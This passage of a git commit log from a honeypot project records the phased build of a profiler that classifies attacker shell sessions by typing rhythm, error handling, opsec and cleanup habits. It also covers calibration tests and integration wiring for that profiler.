paths converge on a single handler that:

1. Validates required payload fields (session_id, decky_id, service,
   attacker_ip, shard_path).
2. Builds evidence_ref shard:{decky}/{service}/{shard_basename}#{sid}
   and skips when has_observations_for_evidence is True (idempotent
   re-runs).
3. Resolves attacker_uuid via get_attacker_uuid_by_ip; defers if the
   profiler tick hasn't materialised the row yet.
4. Reads the asciinema shard, slices events for the sid, calls
   extract_session, persists each Observation via upsert_observation
   (per-row; batch transaction filed as follow-up), then publishes
   each on the bus best-effort (fire-and-forget per DEBT-029 §6).

Architecture:
* Handler lives in decnet/profiler/behave_shell/_handler.py — pure
  function, unit-tested in isolation.
* Worker.py adds _behave_pump (queue feed), _drain_behave_queue
  (per-tick drain), _behave_poll_tick (cursor scan over
  session_recorded logs), and _payload_from_log_row (Log → bus-shape
  payload projection).
* Poll cursor uses a separate state key
  (attacker_worker_session_cursor) so the correlation tick's cursor
  doesn't conflate.
* has_observations_for_evidence promoted to BaseRepository abstract.

22 new tests across handler / drain / poll layers covering happy
path, all skip paths, isolation against handler exceptions,
idempotency on re-run, and cursor key separation. TTP worker bus
tests still green — payload field is purely additive.

Closes BEHAVE-INTEGRATION.md Phase 4.
2026-05-08 18:57:45 -04:00
834aa613b1 feat(pyproject): pin decnet-behave-{core,shell} >=0.1.0,<0.2
Lock the BEHAVE library versions per BEHAVE-INTEGRATION.md
§Versioning. The profiler worker (Phase 4 wiring) imports
`Observation`/`Window` from `decnet_behave_core.spec.envelope` and
`event_topic_for`/`to_event_payload` from
`decnet_behave_shell.spec.event_adapter`; without the pin a broken
wheel or missing install would only show up on first publish.

Four-test smoke pins the public surface: envelope construction,
registry import non-empty, event-adapter topic shape, and the
adapter's id/ts/v exclusion contract.
2026-05-08 18:51:30 -04:00
bf3f9c746a feat(collector): enrich attacker.session.ended payload with shard_path
The collector's _SessionAggregator now resolves the asciinema shard
via find_shard_with_sid and stamps it onto every emitted
attacker.session.ended payload as `shard_path`. None when the shard
isn't on disk yet (collector race with sessrec flush) — consumers
treat that as "skip until next tick".

Additive field; existing TTP worker consumes the same topic and
ignores unknown keys, so no payload-version bump needed. Two new
tests pin the shard-found and shard-missing cases.

Unblocks BEHAVE-INTEGRATION Phase 4: the profiler worker reads
shard_path directly from the payload instead of disk-reaching.
2026-05-08 18:50:45 -04:00
588ea4e411 refactor(artifacts): extract shard-finder out of transcripts router
Move `_find_shard_with_sid`, `_resolve_shard`, `_validate_names`,
`_get_index`, and the index cache from
`decnet/web/router/transcripts/api_get_transcript.py` into
`decnet/artifacts/shards.py`. The shared module speaks
`ValueError`; the router keeps thin wrappers that translate to
`HTTPException(400)` so the route's error UX is unchanged.

This unblocks the BEHAVE-INTEGRATION Phase 4 worker wiring — the
profiler worker (and the collector's session aggregator) need to
disk-reach asciinema shards but must not import from a FastAPI
router.

11 new unit tests for the shared helper. Existing transcript router
tests pass (the shard fixture's monkeypatch points at the shared
module's ARTIFACTS_ROOT now).
2026-05-08 18:49:11 -04:00
aba1e37389 feat(profiler/behave_shell): H.5-pre extractor version marker (0.1.0-pre)
decnet.profiler.behave_shell.__version__ = '0.1.0-pre'.

The -pre suffix is honest: the extractor is feature-complete (37/37
Tier-A primitives emit, calibration grid honest), but the engine
package — worker wiring, observations writes, AttackerDetail panel —
still rides BEHAVE-INTEGRATION.md Phase 4. The actual 0.1.0 tag
lands when Phase 4 lands.

The marker version-tracks the engine, not the spec library
(decnet-behave-shell already at 0.1.0); they version independently.
2026-05-08 18:34:23 -04:00
9ebaca410a test(profiler/behave_shell): H.2 calibration grid full sweep
Run the five-class calibration grid (HUMAN / YOU-sim / LW-sim /
CLAUDE-FF / CLAUDE-CL) against the 2026-05-02 shards.

* Hard gate green for 27 primitives across all 5 shards.
* environmental.keyboard_layout moved from hard gate to
  PHASE_F_CONDITIONAL_PRIMITIVES — short SSH-recon corpus maxes at
  ~90 typed letters per session, well below the LAYOUT_MIN_TYPED_LETTERS
  (200) floor. The 200-floor stays per the per-phase "v0 ships when
  honest" rule; longer-text corpora will surface the layout signal.
* Three primitives never fire on the 2026-05-02 corpus, all already
  conditional and all expected:
  - cognitive.error_resilience.frustration_typing
  - environmental.locale
  - environmental.keyboard_layout

No D / F / G threshold re-tunes needed; only the keyboard_layout
binding-set move. Phase H step log appended to BEHAVE-EXTRACTOR.md
with per-class observation counts.
2026-05-08 18:33:51 -04:00
ac04751c18 test(profiler/behave_shell): H.1 registry-coverage test
Static assertion that every Tier-A primitive in PRIMITIVE_REGISTRY
has a slot in the calibration grid (hard gate or conditional set).
Excludes Tier B (8 cross-session primitives) and Tier C (toolchain.*)
by explicit allow-list and prefix filter.

Three checks:
* every Tier-A primitive is covered (forward direction)
* no extractor set drifts from the registry (reverse, catches typos)
* Tier-A count == 37 (design doc invariant)

CI now fails before a registry addition ships without a feature
function.
2026-05-08 18:30:50 -04:00
f10931f24d test(profiler/behave_shell): Phase G grid lockdown + completion log
Widen calibration binding from PHASE_ABCDEF_PRIMITIVES (25) to
PHASE_ABCDEFG_PRIMITIVES (28 hard). Three Phase G primitives that
emit on any session-with-commands ride the hard gate:

* operational.opsec_discipline
* operational.cleanup_behavior
* emotional_valence.stress_response

The remaining five Phase G primitives ride a new
PHASE_G_CONDITIONAL_PRIMITIVES because their sample-size floors make
them legitimately absent from short shards:

* operational.objective                  (≥ 3 classified commands)
* operational.multi_actor_indicators     (≥ 8 commands)
* emotional_valence.arousal              (typing bursts)
* emotional_valence.valence              (≥ 80 typed letters)
* emotional_valence.frustration_venting  (≥ 30 typed letters)

Backwards-compat alias PHASE_ABCDEF_PRIMITIVES kept. Phase G
completion log + checkbox flips in BEHAVE-EXTRACTOR.md.

Tier-A corpus delta: all 37 Tier-A primitives now emit. Phase H
(full-corpus lockdown + v0 release) is next.
2026-05-08 16:40:13 -04:00
79f253c969 feat(profiler/behave_shell): G.8 emotional_valence.frustration_venting
Binary read of ctx.obscenity_hits (G.0 lexical counter):
* detected — obscenity_hits ≥ 1
* none     — zero hits

Skip below FRUST_VENT_MIN_TYPED_CHARS (30). Confidence hard-capped at
0.5: 0.40 when detected, 0.50 only when cleanly absent over ≥ 200
typed letters, 0.30 otherwise.
2026-05-08 16:37:29 -04:00
40a283a7ec feat(profiler/behave_shell): G.7 emotional_valence.stress_response
Compare median post-error intra-command IATs against baseline
(commands not immediately following an errored command):

* ratio ≥ STRESS_EUSTRESS_RATIO_MIN (1.20) → eustress_positive
* ratio ≤ 1/STRESS_DISTRESS_RATIO_MIN     → distress_negative
* otherwise                                → none

Confidence hard-capped at 0.5; 0.30 below
STRESS_MIN_ERRORED_WITH_IATS (2).
2026-05-08 16:36:34 -04:00
d4dc7dff81 feat(profiler/behave_shell): G.6 emotional_valence.arousal
high_agitated when any of:
  * caps_run_max ≥ 5
  * bang_run_max ≥ 3
  * fastest typing burst median IAT < 0.06s with ≥ 30 IATs total

low_calm when slowest qualifying burst median IAT > 0.30s with ≥ 30
IATs. Else medium_engaged. Confidence hard-capped at 0.5; 0.30 below
AROUSAL_MIN_IATS.
2026-05-08 16:35:29 -04:00
3ba7e22b71 feat(profiler/behave_shell): G.5 emotional_valence.valence
Soft primitive — pure ratio over G.0 lexical counters:

* positive — positive_lex_hits > negative + obscenity, ≥ VALENCE_MIN_HITS
* negative — (negative + obscenity) > positive, sum ≥ VALENCE_MIN_HITS
* neutral  — fall-through

Skip below VALENCE_MIN_TYPED_CHARS (80). Confidence hard-capped at
EMOTIONAL_VALENCE_CONFIDENCE_CAP (0.5) inside the feature function;
0.30 below VALENCE_FULL_CONFIDENCE_MIN (200). Cap is registry
convention.
2026-05-08 16:34:27 -04:00
acf8382bcf feat(profiler/behave_shell): G.4 operational.multi_actor_indicators
Compare median intra-command IATs of the two temporal halves of the
session. ≥ MULTI_ACTOR_HALF_MIN_COMMANDS (4) per half required;
relative delta > MULTI_ACTOR_HANDOFF_DELTA (0.5) → handoff_detected.

team_coordinated is Tier B (cross-session); never emitted from a
single session. Confidence 0.55 with both halves ≥ 8 commands; 0.40
otherwise.
2026-05-08 16:33:15 -04:00
17b53dad4d feat(profiler/behave_shell): G.3 operational.cleanup_behavior
* thorough — ≥ CLEANUP_THOROUGH_MIN_DISTINCT (3) distinct
  cleanup-family hashes in tail-CLEANUP_TAIL_K (5).
* partial  — 1-2 distinct.
* none     — zero hits.

Adjacent to E.4's binary exit_behavior=cleanup; G.3 graduates the
intensity. Confidence 0.55 above 8 commands; 0.35 below.
2026-05-08 16:32:08 -04:00
337c7392b9 chore: untrack accidentally-committed threatfox-api.json
Slipped in via `git add -A` in the G.2 commit. Local artifact, never
intended for tracking.
2026-05-08 16:30:18 -04:00
09f598ce47 feat(profiler/behave_shell): G.2 operational.opsec_discipline
* careful — operator hits OPSEC_HISTORY_TOKENS AND tail-K commands
  include _CLEANUP_TOKEN_HASHES (re-imported from temporal.py).
* learning — history hit without cleanup-tail follow-through.
* careless — no history-clearing vocabulary at all.

Confidence 0.45 (small lexicon, soft); 0.30 below
MIN_COMMANDS_FOR_FULL_CONFIDENCE.
2026-05-08 16:29:48 -04:00
c11f3605be feat(profiler/behave_shell): G.1 operational.objective
Per-command intent classification via the G.0 lexicon
(`destructive > persistence > exfil > lateral > recon` precedence);
majority vote across classified commands. Skip emission below
INTENT_MIN_COMMANDS=3 classified hits. Confidence 0.40 below
INTENT_FULL_CONFIDENCE_MIN=6, 0.60 above.
2026-05-08 16:28:45 -04:00
289a64014c feat(profiler/behave_shell): G.0 intent lexicon + lexical counter pass
Phase G shared infrastructure (no primitive yet emitted):

* New `_intent.py` — five precomputed first-token-hash sets (recon /
  exfil / persistence / lateral / destructive) with documented
  precedence, plus opsec-history and three lexeme sets (positive /
  negative / obscenity) for the typed-text counter pass. Stop words
  that collide with registry value vocabulary (`no`, `hell`, `ok`)
  are deliberately excluded — the PII regression test catches such
  collisions.

* `_typed_char_histograms()` extended with five integer counters
  populated in the same single-pass walk: `obscenity_hits`,
  `positive_lex_hits`, `negative_lex_hits`, `caps_run_max`,
  `bang_run_max`. Longest-suffix match against bounded lexicon
  (`LEXEME_MAX_LEN`); paste-class events excluded.

* `SessionContext` widened by the same five fields. Drives G.5
  (valence), G.6 (arousal), G.8 (frustration_venting) without retaining
  raw operator text.

* Bump twisted >= 26.4.0rc2 to clear CVE-2026-42304 (pre-existing,
  caught by pre-commit pip-audit). Adjust ftp template type-ignore
  code from attr-defined to misc to match the new Twisted typing.

PII discipline: same shape as F.4 — fixed-vocabulary integer counters
on ctx, never on observations.
2026-05-08 16:27:25 -04:00
a25f4a890d test(profiler/behave_shell): Phase F + E.4 grid lockdown + completion log
Widens the binding calibration set from PHASE_ABCDE_PRIMITIVES (20)
to PHASE_ABCDEF_PRIMITIVES (25). The five new entries:

* environmental.shell_type (per-shard hard gate)
* environmental.terminal_multiplexer (per-shard hard gate)
* environmental.keyboard_layout (per-shard hard gate; PII boundary
  lifted by ANTI; emits all 4 registry values)
* environmental.numpad_usage (per-shard hard gate)
* temporal.lifecycle_markers.exit_behavior (resolution of the E.4
  hold; uses Command.followed_by_prompt from F.0)

environmental.locale joins a new PHASE_F_CONDITIONAL_PRIMITIVES set
(only fires on shards with an env / locale dump in the output).

Phase F completion log appended to BEHAVE-EXTRACTOR.md. The original
F.0 row hinted at D.0 subsumption; reversed in the log — D.0 is
enriched, not subsumed (regex catches errors when PS1 is suppressed).

Tier-A corpus delta: 25 of 37 primitives now emit. Phase G is next.
2026-05-04 00:44:22 -04:00
51ecd0924e feat(profiler/behave_shell): emit temporal.lifecycle_markers.exit_behavior
Resolves the E.4 hold from Phase E. F.0's Command.followed_by_prompt
gives us the exit-code proxy (prompt-after-last-command) we couldn't
get in Phase E.

Logic: last command without trailing prompt → abrupt; first_token_hash
in {exit, logout, quit, logoff} → graceful; any of the last K=3
commands' first_token_hash in {history, unset, rm, shred, clear, kill}
→ cleanup; else → graceful (clean Ctrl-D / window close).
2026-05-04 00:42:25 -04:00
c8166a6071 feat(profiler/behave_shell): emit environmental.numpad_usage
Sliding-window scan over single-char digit input events. A run of
NUMPAD_RUN_MIN (4) consecutive digit events whose pairwise IATs are
all ≤ NUMPAD_FAST_IAT_S (50ms) → detected. Otherwise → not_detected.
Skips below NUMPAD_MIN_TYPED_CHARS (50) typed chars. Confidence cap
0.50 per the registry's weak-signal flag.
2026-05-04 00:40:42 -04:00
cd7c7ea5a2 feat(profiler/behave_shell): emit environmental.keyboard_layout
ANTI authorised dropping the PII boundary for this primitive. ctx
gains typed_unigram_counts / typed_bigram_counts / typed_letter_count
populated during the existing single-pass input walk (paste-class
events excluded).

Two-axis classifier:
* layout-artefact unigrams take priority — q rate above floor with
  low English saturation → azerty; z above floor with y below → qwertz
* fallback to English-bigram saturation: ≥ floor → qwerty, else other

Sample-size floor 200 typed letters; bigram histogram capped at
top-64 to bound memory. Confidence cap stays moderate (0.40-0.55) —
heuristic discriminator.
2026-05-04 00:38:24 -04:00
b7ff5d2cc1 feat(profiler/behave_shell): emit environmental.locale
Searches ANSI-stripped output for LANG / LC_ALL / LC_CTYPE envvar
substrings emitted by env / locale / printenv. Highest-priority key
wins (LC_ALL > LANG > LC_CTYPE); POSIX value normalised to BCP-47:
en_US.UTF-8 → en-US, pt_BR.UTF-8 → pt-BR, C/POSIX → und. Free-string
registry value emitted directly.

PII discipline: only the parsed locale value enters observations;
surrounding output is read once for matching and dropped.
2026-05-04 00:35:31 -04:00
4257f7b6e2 feat(profiler/behave_shell): emit environmental.terminal_multiplexer
Scans RAW output (multiplexer escapes are themselves ANSI; never
strip first) for tmux markers (DCS passthrough, focus-reporting,
window-title with tmux marker) and screen markers (DCS, screen-OSC).
Detected → tmux/screen at 0.85; otherwise → none at 0.55. Skips
emission entirely when no commands — silence on a pure-echo or
empty session, per the smoke gates.

When both detected (nested mux), prefer tmux.
2026-05-04 00:33:44 -04:00
07ff5ff0c9 feat(profiler/behave_shell): emit environmental.shell_type
Per-prompt classification mode over ctx.prompt_lines. $/# → bash;
% → zsh; > with 'PS ' prefix → powershell; > with 'C:\' substring →
cmd.exe; > otherwise → fish. New _features/environmental.py module
opens Phase F.
2026-05-04 00:30:24 -04:00
1ff02f0c77 feat(profiler/behave_shell): F.0 prompt-line detector
Adds PromptLine dataclass + extract_prompt_lines() helper. PromptLine
carries ts, suffix_char ($/#/%/>), raw_line (ANSI-stripped, capped),
is_root flag. Populated during the existing single-pass output-window
walk; SessionContext gains prompt_lines, Command gains
followed_by_prompt.

PII trade-off (ANTI-authorised at Phase F): PS1 text retained on ctx
so F.1 / F.3 / E.4 can read it. Capped at PROMPT_LINE_MAX_CHARS=256.
Observations still only carry derived primitive values.

D.0's regex error helpers stay alongside (NOT subsumed) — they fire
even when PS1 echo is suppressed. F.0 enriches D.0 rather than
replacing it.
2026-05-04 00:29:08 -04:00
b7534c311a docs(behave): cross-reference Phase F.0 with held E.4 and landed D.0
F.0's row in BEHAVE-EXTRACTOR.md was forward-only — readers landing
on Phase F couldn't tell that F.0 also has a backlog (E.4 held, D.0
subsumption). Add a 'Carry-overs F.0 must unblock' section to the
Phase F prelude and a back-reference on the F.0 checkbox in the
implementation order checklist.
2026-05-04 00:17:37 -04:00
96a4039366 test(profiler/behave_shell): Phase E grid lockdown + completion log (E.4 held)
Widens the binding calibration set from PHASE_ABCD_PRIMITIVES (17) to
PHASE_ABCDE_PRIMITIVES (20). The three shipped Phase E primitives
(session_duration, escalation_pattern, landing_ritual) join the
per-shard hard gate.

E.4 (temporal.lifecycle_markers.exit_behavior) is held at ANTI's
direction pending Phase F.0's prompt parser — abrupt-vs-cleanup
needs exit-code visibility to be honest, and first-token membership
alone over-fires on benign rm / clear mid-session. E.4 picks up at
the tail of Phase F.

Phase E completion log appended to BEHAVE-EXTRACTOR.md; E.1-E.3
checkboxes flipped, E.4 left unchecked with a held note.
2026-05-04 00:16:33 -04:00
1341df2705 feat(profiler/behave_shell): emit temporal.lifecycle_markers.landing_ritual
Inspect the first N commands; if at least K of their first_token_hashes
match the recon-survey vocabulary (uname/id/whoami/pwd/hostname/w/who),
emit present, else absent. Hashes precomputed at module load; PII-safe.
v0.1 N=5, K=2.
2026-05-04 00:15:05 -04:00
d40495d71b feat(profiler/behave_shell): emit temporal.escalation_pattern
Bin commands into non-overlapping windows of width
max(ESCALATION_WINDOW_MIN_S, duration_s / ESCALATION_WINDOW_TARGET).
CV of per-window counts + zero-window fraction classify bursty /
sustained / erratic. v0.1; corpus re-tune deferred.
2026-05-04 00:13:45 -04:00
627fa59c15 feat(profiler/behave_shell): emit temporal.session_duration
Bucket ctx.duration_s against SESSION_DURATION_SHORT_MAX (60s) /
MEDIUM_MAX (600s) / LONG_MAX (3600s); else marathon. Direct
measurement, confidence 0.85. Skip emission only when no commands
and zero duration. New _features/temporal.py module opens Phase E.
2026-05-04 00:10:57 -04:00
46775fc0e5 test(profiler/behave_shell): Phase D calibration-grid lockdown + completion log
Widens the binding calibration set from PHASE_ABC_PRIMITIVES (13) to
PHASE_ABCD_PRIMITIVES (17). The four unconditional Phase D primitives
(cognitive_load, exploration_style, planning_depth, tool_vocabulary)
join the per-shard hard gate. The three error_resilience.* primitives
are conditional on at least one errored command in the shard and
tracked in PHASE_D_CONDITIONAL_PRIMITIVES — excluded from the
per-shard required-emission set, included in the cross-class
discrimination check.

cognitive_load empirical re-tune deferred to the next
BEHAVE_CALIBRATION_DIR run; v0.1 thresholds ship.

Phase D completion log appended to BEHAVE-EXTRACTOR.md; Phase D
checkboxes flipped to [x].
2026-05-04 00:03:46 -04:00
0fba6b6113 feat(profiler/behave_shell): emit cognitive.error_resilience.fallback_to_man
For each errored command, check whether the next command's
first_token_hash is in {man, help, info} (precomputed at module
load). At least one match → present, else absent. The --help / -h
flag forms aren't first tokens; v0.2 will reconsider once arg-token
hashing is justified by corpus.
2026-05-04 00:01:45 -04:00
8183218d29 feat(profiler/behave_shell): emit cognitive.error_resilience.frustration_typing
Compares median within-command IAT for commands following an errored
command vs commands following a successful one. Relative absolute delta
buckets to low / moderate / high. Skips when either group is empty
(no errors, or no clean baseline). v0.1; D.8 re-tunes.
2026-05-04 00:00:36 -04:00
b704352783 feat(profiler/behave_shell): emit cognitive.error_resilience.retry_tactic
Modal response across Command.errored=True commands:
* same first_token_hash on next command → rerun
* different first_token_hash         → switch
* no next command                    → abort
Tiebreak in registry order. The fourth registry value 'modify'
requires within-command arg diffing (PII boundary); deferred to v0.2.
2026-05-03 23:58:58 -04:00
f286c84d95 feat(profiler/behave_shell): emit cognitive.tool_vocabulary
Absolute distinct first_token_hash count, bucketed against
TOOL_VOCAB_NARROW_MAX / TOOL_VOCAB_BROAD_MIN. v0.1; D.8 re-tunes.
2026-05-03 23:56:22 -04:00
6c2e4ada83 feat(profiler/behave_shell): emit cognitive.planning_depth
Distribution of inter-command IATs bucketed against IKI_THINK_MAX_S
(deep) and INTER_CMD_INSTANT_MAX (reactive); fall-through is shallow.
v0.1 thresholds; D.8 re-tunes.
2026-05-03 23:55:16 -04:00
2254651270 feat(profiler/behave_shell): emit cognitive.exploration_style
Two-axis classification over the first_token_hash sequence:
repetition_rate (drilling) vs backtrack_rate (jumping among prior
tools). chaotic/targeted/methodical buckets. v0.1 thresholds; D.8
re-tunes.
2026-05-03 23:54:03 -04:00
f948e10830 feat(profiler/behave_shell): emit cognitive.cognitive_load
Composite over three [0, 1]-clipped sub-signals (chunking variance,
error rate from D.0's Command.errored, pace variability), mean-aggregated
and bucketed against COGNITIVE_LOAD_LOW_MAX / COGNITIVE_LOAD_MEDIUM_MAX.
Components missing data drop out of the mean rather than zeroing it.

v0.1 thresholds; D.8 re-tunes once D.2-D.7 are stable. Confidence
held at 0.60 (composite over soft sub-signals) and halved below the
5-command sample-size floor.
2026-05-03 23:52:29 -04:00
601986bd6d feat(profiler/behave_shell): output error-signal helper for Phase D
Lifts the error-signal slice of F.0 forward as a D.0 prelude. ANSI
strip + canonical bash/sh error fingerprints classify each command's
post-execution output window; Command gains errored / output_bytes
fields. PII discipline preserved — only a bool and an int leave the
helper, the stripped output text is dropped on return.

Drives D.1 (cognitive_load error_rate term) and D.5–D.7 (error_resilience
family). Phase F.0 will subsume this with PS1 + exit-code parsing.
2026-05-03 23:46:31 -04:00
bc62e42ce1 feat(profiler/behave_shell): emit motor.shell_mastery.pipe_chaining_depth 2026-05-03 23:34:54 -04:00
4fc980e968 feat(profiler/behave_shell): emit motor.shell_mastery.shortcut_usage 2026-05-03 23:33:07 -04:00
a077cf67c8 feat(profiler/behave_shell): emit motor.shell_mastery.tab_completion 2026-05-03 23:31:20 -04:00
771944830a docs(behave): close Phase B in BEHAVE-EXTRACTOR.md
Tick the four Phase B checkboxes (B.1-B.4) and append a Phase B
completion log inline (per the "append phase logs to design docs"
memory rule). Captures per-primitive confidence ranges, source
signals, and the PII-discipline regression that all four
primitives uphold.

Phase A + Phase B = 10 primitives emitting on every shard;
PHASE_AB_PRIMITIVES is binding for every subsequent phase.
Phase C (motor.shell_mastery.*) lands next.
2026-05-03 21:30:13 -04:00
8161c67ec5 feat(profiler/behave_shell): emit motor.command_chunking
BEHAVE-EXTRACTOR.md Phase B Step B.4. First implementation —
prototype doesn't ship this primitive.

* SessionContext gains intra_command_iats: per-command tuple of
  IATs between consecutive input events whose timestamps fall
  inside [cmd.start_ts, cmd.end_ts). Excludes the terminator IAT.
  Built by _per_command_iats.
* _features/motor.py:command_chunking(ctx) emits one Observation
  in {fluent, fragmented, single_command}.
  - 0 commands → skip emit
  - 1 command → single_command (registry-allowed point)
  - ≥2 commands → median CV across per-command typed-IATs;
    < CMD_CHUNKING_FLUENT_CV_MAX (0.50) → fluent, else fragmented
  - paste-only sessions (no command has ≥3 typed IATs) → skip emit
    (no honest within-command rhythm to measure)
  Confidence 0.80 / 0.65 / 0.60.
* Calibration grid widened to include motor.command_chunking;
  green across all five shards. Phase B primitive set complete.

Tests: no commands → skip, 1 command → single_command, uniform
typing → fluent, alternating fast/slow → fragmented, paste-only
multi-command → skip emit.
2026-05-03 21:29:31 -04:00
d04f91cd8c feat(profiler/behave_shell): emit motor.error_correction
BEHAVE-EXTRACTOR.md Phase B Step B.3. Replaces the prototype's
two-line "0 vs >0 backspaces" placeholder with a backspace-timing
classifier that honours the registry's full vocabulary.

* SessionContext gains backspace_count, backspace_iats (IAT from
  each backspace back to the preceding non-backspace input event),
  and kill_line_count (^U / ^W). Built by _scan_correction_signals,
  which retains only counts and timing aggregates — no character
  data leaves the helper, in line with the BEHAVE PII discipline.
* _features/motor.py:error_correction(ctx) emits one Observation
  in {immediate, deferred, absent, route_around}.
  - 0 backspaces + ≥1 ^U/^W → route_around (rewrite, not correct)
  - 0 backspaces + 0 kill-lines → absent
  - backspaces with median IAT ≤ 500 ms → immediate
  - slower → deferred
  Confidence 0.65 / 0.65 / 0.55 / 0.55.
* < 3 inputs → skip emit.
* Calibration grid widened to include motor.error_correction;
  green across all five shards.

Tests cover all four buckets, the < 3 inputs skip, and the PII
regression (raw command body never appears in the serialised
observation).
2026-05-03 21:27:46 -04:00
0737fcfe93 feat(profiler/behave_shell): emit motor.motor_stability
BEHAVE-EXTRACTOR.md Phase B Step B.2. First principled
implementation — the prototype doesn't ship this primitive at all.

* _features/motor.py:motor_stability(ctx) emits one Observation
  in {steady, variable, tremor}. Reuses ctx.typing_bursts from B.1.
* Tremor proxy: fraction of within-burst IATs below
  TREMOR_FAST_FLOOR_S (30 ms — humans can't sustain sub-50 ms IATs).
  ≥ TREMOR_RATE_MIN (10%) sub-floor → tremor (double-press / motor
  twitch / stuck-key).
* Otherwise median burst CV decides: < CV_STEADY_MAX → steady,
  else → variable. Confidence 0.70 / 0.60 / 0.65.
* No typing bursts or fewer than 5 within-burst IATs → skip emit.
* Calibration grid widened to include motor.motor_stability; green
  across all five shards.

Tests cover all three buckets + skip paths.
2026-05-03 21:25:54 -04:00
d90c8b70ce feat(profiler/behave_shell): emit motor.keystroke_cadence
BEHAVE-EXTRACTOR.md Phase B Step B.1.

* SessionContext gains typing_bursts: tuple[tuple[float, ...], ...]
  built by _split_typing_bursts(iats) — splits at gaps > IKI_THINK_MAX_S
  (1.5s) and drops bursts of fewer than 3 IATs. Mirrors prototype's
  _split_into_bursts at BEHAVE/prototype_extractors/shell/extract.py:275.
* _features/motor.py:keystroke_cadence(ctx) emits one Observation
  in {steady, bursty, hunt_and_peck, machine}. Median CV across
  typing bursts; mean IKI < IKI_MACHINE_MAX_S paired with CV <
  CV_MACHINE_MAX → machine. Confidence 0.85/0.70/0.65/0.60 per the
  prototype's calibration history.
* < MIN_INPUTS_FOR_CADENCE inputs or zero typing bursts → skip
  emission. v0.1 emits only the burst-CV variant; the prototype's
  NAIVE session-CV variant is parked for v0.2.
* Calibration grid widened (PHASE_A_PRIMITIVES → PHASE_AB_PRIMITIVES)
  to include motor.keystroke_cadence. Grid green across all five
  shards.

Tests: too-few-inputs → no emit, all-think-pauses → no burst → no
emit, uniform IATs → steady, sub-5ms → machine, mixed-pace → bursty,
extreme bimodal → hunt_and_peck.
2026-05-03 21:24:13 -04:00
0510cde073 feat(profiler/behave_shell): Phase A — calibration floor green
BEHAVE-EXTRACTOR.md Phase A Step 10. Closes the discriminative
floor: six primitives emit, the five-class calibration grid is the
binding regression test for every subsequent phase.

* Phase A checklist boxes (Steps 0-10) ticked in
  development/BEHAVE-EXTRACTOR.md.
* Phase A completion log appended inline to the design doc per
  the "append phase logs to design docs" memory rule — captures
  per-primitive confidence ranges and the 2026-05-02 empirical
  anchors that drove threshold calibration.
* Hard gate: tests/profiler/behave_shell/test_calibration_grid.py
  parametrised over five class shards, all green; skips cleanly
  on BEHAVE_CALIBRATION_DIR unset.

Phases B-G expand horizontally across the registry. Phase H is
the full-corpus lockdown + v0 release. Worker
(BEHAVE-INTEGRATION.md Phase 4) is unblocked at this milestone —
it can wire per-session production against the Phase A engine
without waiting for the rest of the Tier-A corpus.
2026-05-03 08:02:02 -04:00
640294f3dc test(profiler/behave_shell): five-class calibration grid lockdown
BEHAVE-EXTRACTOR.md Phase A Step 9 — the gate. Runs the pure
engine against each of the five 2026-05-02 calibration shards and
pins the contract that all subsequent Phase B-G PRs must keep
green: every Phase A primitive (motor.input_modality,
motor.paste_burst_rate, cognitive.inter_command_latency_class,
cognitive.command_branch_diversity, cognitive.feedback_loop_engagement,
cognitive.inter_command_consistency) fires at least once per shard.

* tests/profiler/behave_shell/test_calibration_grid.py
  parametrized over (shard_file, class_label) for HUMAN / YOU-sim /
  LW-sim / CLAUDE-FF / CLAUDE-CL. Skips entirely when
  BEHAVE_CALIBRATION_DIR is unset (CI provides the path; local dev
  doesn't have to).
* Plus a discrimination-smoke check: at least one primitive
  produces different majority values across present classes —
  catches the "constant-output regression" failure mode where the
  engine quietly degenerates to a stub.

Calibration tweak: BRANCH_DIVERSITY_LINEAR_MIN dropped from 0.80 to
0.70 to align with the prototype's empirical anchors (CLAUDE-CL ≈
0.55-0.60 adaptive; YOU-sim / CLAUDE-FF scripted recon ≈ 0.75+
linear). Test for the middle band re-pinned at the new boundary.

Per-class value pinning (e.g. HUMAN must emit
inter_command_consistency=bimodal) is intentionally NOT a hard gate
yet — v0.1 thresholds put real human sessions in "variable", and
true bimodal detection (Hartigan dip / two-peak) is registry-flagged
for v0.2. Tighter pinning lands as the corpus grows.
2026-05-03 08:00:50 -04:00
842b7de950 feat(profiler/behave_shell): emit cognitive.inter_command_consistency
BEHAVE-EXTRACTOR.md Phase A Step 8. Dispersion / bimodality of
inter-command pauses. HUMAN-bimodal vs LLM-metronomic.

* _features/cognitive.py:inter_command_consistency(ctx) emits one
  Observation in {metronomic, variable, bimodal}.
* CV = stdev / mean of ctx.inter_cmd_iats. CV < 0.40 → metronomic
  (LLM-pure; corpus anchor 0.24); CV ≥ 1.50 → bimodal heuristic
  (LLM-assisted human; v0.1 placeholder, true bimodal via Hartigan
  dip is registry-flagged for v0.2); else → variable (human;
  corpus anchor 0.94).
* < 2 IATs or zero mean → skip emission. < 5 commands halves
  confidence (0.40 vs 0.75) per sample-size honesty.

Tests: too-few IATs → no emission, uniform → metronomic,
human-like dispersion → variable, extreme bursts+gaps → bimodal,
low-sample-count → reduced confidence.

Step 8 closes the six-primitive calibration floor for Phase A.
Step 9 (calibration grid lockdown) is the gate that pins it.
2026-05-03 07:56:49 -04:00
2f8c107e70 feat(profiler/behave_shell): emit cognitive.feedback_loop_engagement
BEHAVE-EXTRACTOR.md Phase A Step 7. The orthogonal axis — does the
operator's pause-after-command correlate with bytes of output they
just saw? Splits HUMAN/CLAUDE-CL (closed_loop) from LW-sim/CLAUDE-FF
(fire_and_forget); cuts ACROSS the LLM/human axis.

* _features/cognitive.py:feedback_loop_engagement(ctx) emits one
  Observation in {closed_loop, fire_and_forget, unknown}.
* Pearson correlation between ctx.output_per_cmd[i] and
  ctx.inter_cmd_iats[i] (paired by construction in Step 4); via
  statistics.correlation with constant-series fallback to "unknown".
* r > FEEDBACK_CORRELATION_MIN (0.30) → closed_loop; otherwise
  (zero, negative, or undefined) → fire_and_forget.
* First primitive that depends on output events: zero output events
  in the shard or fewer than FEEDBACK_MIN_PAIRS (5) pairs → emit
  "unknown" at confidence 1.0 (the absence-of-data is itself a
  high-confidence answer). Zero-command session skips entirely.

Tests: no-output → unknown, few-pairs → unknown, strong positive r
→ closed_loop, constant pace → fire_and_forget/unknown,
negative r → fire_and_forget.
2026-05-03 07:55:38 -04:00
3fc6ea5f75 feat(profiler/behave_shell): emit cognitive.command_branch_diversity
BEHAVE-EXTRACTOR.md Phase A Step 6. Content-based playbook-vs-
adaptive split. Splits CLAUDE-FF (linear_playbook, ~10 distinct
tools) from CLAUDE-CL (adaptive_branching, 5-6 tools with curl
